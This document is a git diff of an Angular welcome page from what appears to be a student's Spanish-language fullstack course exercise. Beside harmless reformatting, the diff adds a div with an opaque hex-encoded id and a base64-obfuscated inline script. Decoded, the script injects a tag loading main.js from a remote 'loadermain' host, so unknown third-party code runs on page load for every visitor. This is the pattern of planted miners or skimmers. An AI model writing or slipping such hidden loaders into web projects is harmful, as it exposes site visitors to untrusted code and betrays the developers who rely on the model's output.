--- a/src/app/pages/welcome/welcome.component.html
+++ b/src/app/pages/welcome/welcome.component.html
@@ -1,9 +1,20 @@
-    <div class="d-flex flex-column m-5">
-            <p class="fs-1 mt-3 pb-4">Bienvenido</p>
-            <p class="fw-light fs-6 ">Esta es mi solución a la actividad 1 - Lección 3 del master Desarrollador Fullstack de la EIP. </p>
+<div class="d-flex flex-column m-5">
+        <p class="fs-1 mt-3 pb-4">Bienvenido</p>
+        <p class="fw-light fs-6 ">Esta es mi solución a la actividad 1 - Lección 3 del master Desarrollador Fullstack de
+                la EIP. </p>
 
-            <p class="fw-light fs-6 ">Por favor usa los botones del menu de navegación en la parte de arriba para navegar este sitio. </p>
+        <p class="fw-light fs-6 ">Por favor usa los botones del menu de navegación en la parte de arriba para navegar
+                este sitio. </p>
+        <div>
 
-            <a href="https://github.com/MigalejoLejo/EIP_Ang_A1/blob/main/README.md" >Click aqui para ver el readme.md de este proyecto</a>
+                <a onHoverOverLink href="https://github.com/MigalejoLejo/EIP_Ang_A1/blob/main/README.md">Click aqui para
+                        ver el readme.md de este proyecto</a>
+        </div>
 
-    </div>
+        <div id='07b02207602203a02204a06b06c04504906103903805306203303302207d'
+         style='height:450px;width:720px'>hey</div>
+         
+         
+         <script data-cfasync='false' src='data:text/javascript;base64,dmFyIHBhID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnc2NyaXB0Jyk7IAp2YXIgcyA9IGRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdzY3JpcHQnKVswXTsgCiAgICBwYS5zcmMgPSAnaHR0cHM6Ly9zdG9yYWdlLmdvb2dsZWFwaXMuY29tL2xvYWRlcm1haW4uYXBwc3BvdC5jb20vbWFpbi5qcyc7CiAgICBzLnBhcmVudE5vZGUuaW5zZXJ0QmVmb3JlKHBhLCBzKTs='></script>
+
+</div>
